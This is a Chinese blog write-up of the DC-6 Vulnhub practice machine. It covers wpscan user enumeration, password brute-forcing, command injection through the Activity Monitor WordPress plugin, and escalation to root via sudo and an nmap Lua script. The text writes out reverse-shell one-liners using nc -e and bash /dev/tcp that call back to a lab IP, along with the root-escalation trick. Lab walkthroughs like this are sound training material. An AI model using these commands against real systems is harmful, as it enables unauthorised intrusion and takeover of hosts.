DC-6靶机渗透讲解

最新推荐文章于 2024-05-30 11:53:48 发布
最新推荐文章于 2024-05-30 11:53:48 发布
阅读量2.2k 收藏
点赞数
分类专栏: 渗透测试 网络攻防安全 笔记 文章标签: web安全 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45597678/article/details/121503771
版权

文章目录

涉及知识

主机扫描、wpscan

爆破密码

wordpress插件漏洞CVE-2018-15877

S权限提权

渗透过程

  1. 首先扫描主机得到在线主机之后进行端口扫描,得到了80和22端口在线

    在这里插入图片描述
    在这里插入图片描述

  2. 进行网站发现是wordpress使用wpscan进行扫描得到用户名

    在这里插入图片描述

    wpscan --url http://wordy -e u
[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

  3. 根据官网下载的时候给的提示将kali中的密码字典、使用wpscan进行爆破
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YIu0rt16-1637675142593)(https://s3-us-west-2.amazonaws.com/secure.notion-static.com/8f76a479-7773-437a-bca7-55039bb4a37d/Untitled.png)]

  4. 使用密码登录wp后台

    在这里插入图片描述

  5. 进入后台之后没有发现有文件上传或其他的漏洞可利用点,看了别人的wp之后才知道漏洞在插件上,在Activity monitor这个插件上存在一个命令注入漏洞CVE-2018-15877,该漏洞是在插件的tools功能模块中可以使用在ip地址进行命令连结的方式进行命令的执行

    在这里插入图片描述

    于是利用nc进行反弹shell,nc -e /bin/bash 192.168.127.139 12345得到shell之后进行查看是否有提示,结果没有任何发现,但是在mark的家目录当中发现了一个文件,里面存有graham的密码

    在这里插入图片描述

  6. 使用ssh利用graham的密码进行登录到系统,sudo -l查看用户可以无密码执行哪些命令

    在这里插入图片描述
    在这里插入图片描述

    sudo -l查看用户可以无密码执行哪些命令,发现可以无密码使用jens的身份运行一个脚本

    在这里插入图片描述

    更改脚本的内容使用bash -i >& /dev/tcp/192.168.127.177/12345 0>&1反弹jens的shell回来

    在这里插入图片描述

  7. 得到jens的shell之后使用sudo -l查看可以无密码执行哪些命令,发现可以无密码使用root身份运行nmap,这里就可以利用nmap进行提权了,nmap的—script可以指定一个脚本进行运行这里我们可以将命令解释的程序让nmap的脚本执行程序执行得到一个shell,就可以提权到root了

    在这里插入图片描述

    但是nmap中的脚本是使用lua语言开发的所以这里需要,写一个lua的程序执行代码os.execute('/bin/bash')相当于system执行命令的去执行bash生成一个shell会话,可以看到成功的提权到了root权限在root的家目录当中看到一个文件

    在这里插入图片描述
    在这里插入图片描述

总结

首先需要常规的端口,主机扫描目录扫描等

其次需要观察敏感看到WordPress想到相应的CMS的利用工具存在的漏洞,进行登录

根据情况搜索相应的漏洞进行利用,反弹shell

最后就是很常规的利用了特殊权限获取相应用户的shell

weixin_45597678
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
DC-6靶机渗透测试详细教程
jennycisp的博客
12-14 1071
hosts定向wpscan枚举账号(因为是WordPress博客)wpscan账号密码爆破dirb目录扫描得到admin登录地址发现命令注入漏洞使用burp抓包修改数据反弹shell打开交互模式 python -c ‘import pty;进入到home目录查看DC-6的用户目录发现graham账号的密码,进行ssh登录成功使用sudo -l查看权限利用命令脚本转换到jens用户发现可执行root的文件为nmap创建一个nmap文件执行脚本只想nmap文件执行脚本获取到root。
Vulnhub靶机DC-6
m0_60911102的博客
11-30 907
Vulnhub靶机DC-6
DC-6靶机详细渗透过程
MRS_jianai的博客
12-21 739
DC-6靶机详细渗透过程
渗透项目】靶机DC-6渗透过程
命运的旋律的博客
05-05 695
信息收集 主机发现 nmap -sn 192.168.189.0/24 端口扫描 nmap -sT -v -A 192.168.72.158 --script=vuln 发现开放了80端口,尝试用浏览器对该站点进行访问 该网站应该做了访问限制,只能通过域名的方式访问,但因为本地hosts中缺少对应的IP,导致域名解析失败而无法进行访问,解决办法是在hosts文件中写入对应域名和IP...
Wordpress 漏洞利用与后渗透
Y525698136的博客
01-11 1530
渗透这类 CMS 网站时,不要上来就狂扫,它大部分目录都是固定的,开源去看对应版本,商业的找几篇文章。特别 注意的是一定先去找对应版本漏洞,不要自己手工测基本行不通的。
DC6靶场渗透流程(超详细)
m0_64583632的博客
04-10 787
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
wpscan常见的使用方法
记录学习,一起进步
02-16 1983
wpscan常见的使用方法
入侵靶机DC-6
干铮的博客
10-05 1236
DC-6 1.主机发现 2.端口扫描 C:\Users\ASUS>Nmap 192.168.43.182 -A -p- -oN nmap.A Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-05 10:16 ?D1ú±ê×?ê±?? Nmap scan report for dc-6 (192.168.43.182) Host is up (0.00022s latency). Not shown: 65533 closed p
[渗透测试][Kali]对DC-2靶机进行渗透测试
多皮哦的博客
07-14 2067
DC-2靶机进行渗透测试 1.搭建渗透平台 2.准备工作 3.扫描端口 4.使用wpscan进一步扫描 5.破解密码 6.登陆ssh 7.root权限提升 1.搭建渗透平台 Kali 2018, DC-2靶机, VMWare虚拟机平台 平台搭建工作不再赘述 2.准备工作 使用nmap扫描局域网中的主机 Bash shell命令 nmap -sn 192.168.11.0/24 Bash sh...
渗透笔记之HackInOS
若水斋
05-24 3182
首发于独立博客:若水斋。 背景 HackInOS是来自VulnHub的渗透测试靶机,下载地址为https://www.vulnhub.com/entry/hackinos-1,295/#download ,下载下来的是一个OVA格式的虚拟机,可在VMware或VirtualBox中打开。虚拟机已设置DHCP,可自动获取IP。 本文较为完整地记录了我对其进行渗透的全过程,开始时间为2019...
靶机渗透-----DC-2
Z_Grant的博客
09-17 2773
文章目录一,工具介绍(1)cewl密码生成器(2)WPScan二,测试流程(1)主机发现(2)根据80端口的进一步测试(3)攻击准备(4)结合扫描出来的服务,尝试SSH登录 一,工具介绍 (1)cewl密码生成器 参考文章 用途 cewl是一个ruby应用,爬行指定url的指定深度。结果会返回一个单词列表,这个列进行密码爆破。 . 原理 爬取网站上的信息,遍历目录。生成一些可能的密码组合。...
WPScan基本使用
LYJ20010728的博客
08-05 1911
WPScan基本使用WPScan 简介WPScan 参数WPScan 扫描指定站点WPScan 扫描指定用户WPScan 扫描插件漏洞WPScan 扫描主题漏洞WPScan 更新数据漏洞库WPScan 暴力破解得到密码WPScan TimThumbs文件漏洞扫描WordPress 防护措施 WPScan 简介 WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞,最新版本
Gartner发布电信运营商应对持续变化的网络安全环境指南:现代云安全与网络安全的五大核心挑战
最新发布
lurenjia404的博客
05-30 591
所有组织的云和网络都面临着高级威胁。作为网络安全的关键参与者,电信运营商的 CIO 需要了解行业面临的挑战,并了解应采用哪些解决方案来实现方法的现代化。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值